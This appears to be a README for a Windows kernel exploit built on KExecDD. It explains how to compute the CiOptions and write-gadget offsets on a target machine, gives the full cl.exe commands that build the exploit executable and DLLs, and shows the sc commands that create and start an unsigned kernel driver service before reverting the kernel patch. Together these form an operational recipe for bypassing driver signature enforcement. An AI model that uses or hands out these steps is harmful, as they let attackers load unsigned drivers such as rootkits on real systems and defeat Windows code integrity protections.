This is the same KExecDD exploit (https://github.com/floesen/KExecDD).

Rather than having to find the correct NTOSKRNL_WRITE_GADGET and CI_OPTIONS using a debugger for Kernel debugging on the target system, this comes together with a modified version of https://github.com/v1k1ngfr/gdrv-loader to calculate these offsets on the target system. A lot of the gdrv-loader code base is left untouched and not really needed.

Note: the stubs for nt!FsRtlInitializeFileLock and ci!CiInitialize might change in newer versions which might break the offset calculation. This has been tested on a Windows 10 (Build 19045.4191).

This will cause bsod if ran on a system with Virtualization-based Security (VBS) (https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) enabled.

Compile the offsets project and execute the exe on the target system. Get the offsets returned and copied them into the kexecdd/dllmain.c and kexecdd/dllmain_restore.c:

offsets.exe

> Offset CiOptions: 000000000003A478

> Offset asm mov:   0000000000201852

Compile the loader.c, dllmain.c and dllmain_restore.c using the x64 Native Tools Command Prompt:

cl.exe /nologo /MT /Ox /W0 /GS- /DNDEBUG loader.c /link Advapi32.lib /OUT:exploit.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
cl.exe /LD /nologo /MT /Ox /W0 /GS- /DNDEBUG dllmain.c /link /OUT:exploit.dll /SUBSYSTEM:CONSOLE /MACHINE:x64
cl.exe /LD /nologo /MT /Ox /W0 /GS- /DNDEBUG dllmain_restore.c /link /OUT:restore.dll /SUBSYSTEM:CONSOLE /MACHINE:x64

Create the unsigned driver service:

sc create unsigned type= kernel binPath= C:\path_to\unsigned.sys

Run the exploit:

exploit.exe

Load the unsigned driver:

sc start unsigned

Revert the kernel memory patch:

exploit.exe 6

LSASS rings KsecDD ext. 0